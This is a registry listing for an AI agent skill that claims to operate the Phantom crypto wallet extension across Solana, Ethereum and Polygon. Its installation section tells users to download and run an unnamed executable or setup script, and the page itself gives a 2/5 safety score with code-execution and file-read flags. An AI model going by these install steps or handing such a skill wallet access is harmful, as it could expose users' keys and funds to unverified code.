ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet with OpenClaw. Manage Solana, Ethereum, and Polygon assets, add custom RPCs, and monitor transactions securely.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-jwik3
Or

What This Skill Does

The phantom skill enables your OpenClaw AI agent to interact with the Phantom browser extension, bridging the gap between automated workflows and your Web3 wallet. It serves as a command interface for managing multi-chain assets, configuring network connections, and auditing security settings directly through the agent. By facilitating interaction with the Phantom extension, this skill allows for seamless asset management across Solana, Ethereum, Polygon, and Base networks without needing manual UI navigation.

Installation

To begin, ensure you have the openclaw-agent utility installed on your system. For Windows users, download the provided executable and run it. For macOS, execute the provided setup script in your Terminal. Once the environment is prepared, install the skill via your terminal using the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-jwik3. Verification of the agent's connectivity is required before wallet commands will execute.

Use Cases

This skill is designed for power users and developers managing decentralized finances. Primary use cases include automating the addition of custom RPC nodes to improve transaction speed on Solana, managing EVM network configurations for cross-chain activity, importing SPL tokens for portfolio tracking, and auditing connected dApps for security purposes. It is particularly useful for troubleshooting stuck transactions via the CLI and monitoring account balances across multiple chains simultaneously.

Example Prompts

  1. "Phantom, add the custom RPC endpoint for Helius using this key: [API_KEY] and set it as my primary Solana network."
  2. "Check my current wallet balance for the USDC token on Solana and list all my connected dApps."
  3. "Troubleshoot my last Solana transaction; the signature is [TX_SIGNATURE] and it appears to be stuck."

Tips & Limitations

Always exercise caution when exporting private keys; utilize the solana-keygen tool only in secure environments. Note that manual intervention is occasionally required for sensitive operations like transaction signing for security reasons. Keep your openclaw-agent updated to ensure compatibility with the latest Phantom browser extension updates. Priority fees are configurable, but always monitor gas volatility on Ethereum and Polygon to ensure your transactions are prioritized correctly.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-jwik3": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#web3#blockchain#wallet#solana#ethereum
Safety Score: 2/5

Flags: network-access, file-read, external-api, code-execution